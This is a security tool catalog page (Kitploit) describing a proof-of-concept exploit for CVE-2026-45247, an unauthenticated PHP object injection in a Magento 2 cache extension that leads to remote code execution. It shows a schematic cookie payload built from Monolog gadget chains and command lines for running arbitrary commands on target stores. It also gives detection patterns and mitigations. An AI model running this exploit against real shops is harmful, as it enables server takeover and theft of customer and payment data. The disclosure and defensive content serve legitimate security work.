Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE- — PoC функциональный для CVE-2026-45247: PHP Object Injection к RCE без аутентификации в Mirasvit Full Page Cache (Magento 2). | Kitploit
Инструменты/GitHubGitHub/fevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubfevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-

PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE-

PoC функциональный для CVE-2026-45247: PHP Object Injection к RCE без аутентификации в Mirasvit Full Page Cache (Magento 2).

Репозиторий
13 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-45247 - Mirasvit Full Page Cache Warmer для Magento 2 - PHP Object Injection → RCE

CVE-2026-45247 CVSS CISA KEV

📋 Описание

CVE-2026-45247 — критическая уязвимость PHP Object Injection (внедрение PHP-объектов) в расширении Mirasvit Full Page Cache Warmer для Magento 2 и Adobe Commerce. Неаутентифицированный злоумышленник может добиться удаленного выполнения кода (RCE) путем отправки вредоносного сериализованного PHP-объекта в cookie CacheWarmer.

Уязвимость заключается в неограниченном вызове нативной функции PHP unserialize() в сочетании с доступными в Magento и его зависимостях (особенно Monolog) гаджет-цепочками (gadget chains).

АтрибутЗначение
CVECVE-2026-45247
ПродуктMirasvit Full Page Cache Warmer for Magento 2
Затронутые версииВсе версии до 1.11.12
Доступное исправлениеВерсия 1.11.12 (25 мая 2026 г.)
Оценка CVSS9.8 (Критическая)
ВекторAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Статус в CISA KEVПодтвержденная активная эксплуатация (добавлена 03.06.2026)
Крайний срок06.06.2026

🚨 Механизм атаки

  1. Расширение обрабатывает cookie CacheWarmer в каждом запросе магазина
  2. Значение cookie передается в unserialize() без санитизации
  3. Злоумышленник отправляет вредоносный сериализованный PHP-объект
  4. Используя гаджет-цепочки Monolog (SyslogUdpHandler, BufferHandler, FingersCrossedHandler), достигается RCE
  5. Команда выполняется на сервере с привилегиями веб-службы

⚙️ Фазы атаки

Фаза 1: Разведка

root@kitploit:~
# Verificar si la tienda usa Mirasvit Cache Warmer
curl -s https://tienda.com/pub/media/mirasvit/cache_warmer/CHANGELOG.md

Фаза 2: Анализ уязвимости

root@kitploit:~
# La cookie se procesa en cada request sin autenticación
# El código vulnerable en Mirasvit:
$cookieValue = $_COOKIE['CacheWarmer'];
$data = unserialize(base64_decode($cookieValue));  # ¡Peligro!

Фаза 3: Эксплуатация

root@kitploit:~
# Construcción de la cookie maliciosa
payload = serialize(PHPObjectInjection())
cookie_value = f"CacheWarmer:{base64_encode(payload)}"

# Envío de la petición
requests.get(target, cookies={'CacheWarmer': cookie_value})

🛠️ Использование PoC

Установка

root@kitploit:~
git clone https://github.com/tu-usuario/CVE-2026-45247.git
cd CVE-2026-45247
pip install requests

Базовый запуск

root@kitploit:~
# Verificar vulnerabilidad
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com --check-only

# Ejecutar comando 'id'
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "id"

# Ejecutar comando personalizado
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "whoami"

# Usar proxy para depuración
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "ls -la" --proxy http://127.0.0.1:8080

Быстрый скрипт

root@kitploit:~
# Verificar con script bash
chmod +x check_cve_2026_45247.sh
./check_cve_2026_45247.sh https://tienda.ejemplo.com

📊 Продемонстрированное воздействие

  • Удаленное выполнение команд (RCE) на сервере Magento
  • Полный доступ к базе данных клиентов и заказов
  • Установка веб-шеллов для сохранения доступа
  • Полная компрометация интернет-магазина
  • Потенциальная утечка данных кредитных карт
  • Боковое перемещение в корпоративной инфраструктуре

🛡️ Обнаружение

Индикаторы компрометации (IOCs)

В журналах доступа:

root@kitploit:~
CacheWarmer: (Tz|Qz|YT)[a-zA-Z0-9+/=]+

Команды, наблюдаемые при эксплуатации:

root@kitploit:~
echo PWNED_CVE2026_$(date +%s)
sleep 5

Используемые гаджет-цепочки:

  • Monolog\Handler\SyslogUdpHandler
  • Monolog\Handler\BufferHandler
  • Monolog\Handler\FingersCrossedHandler
  • Monolog\Handler\GroupHandler

🔧 Смягчение последствий

Немедленное обновление

root@kitploit:~
# Actualizar a versión parcheada
composer require mirasvit/module-cache-warmer:1.11.12
bin/magento cache:flush

Временные меры

root@kitploit:~
# Bloquear cookie CacheWarmer en .htaccess o nginx
RewriteCond %{HTTP_COOKIE} CacheWarmer
RewriteRule .* - [F,L]
root@kitploit:~
// En app/code/local/Custom/BlockCookie.php
if (isset($_COOKIE['CacheWarmer'])) {
    unset($_COOKIE['CacheWarmer']);
}
Скачать инструмент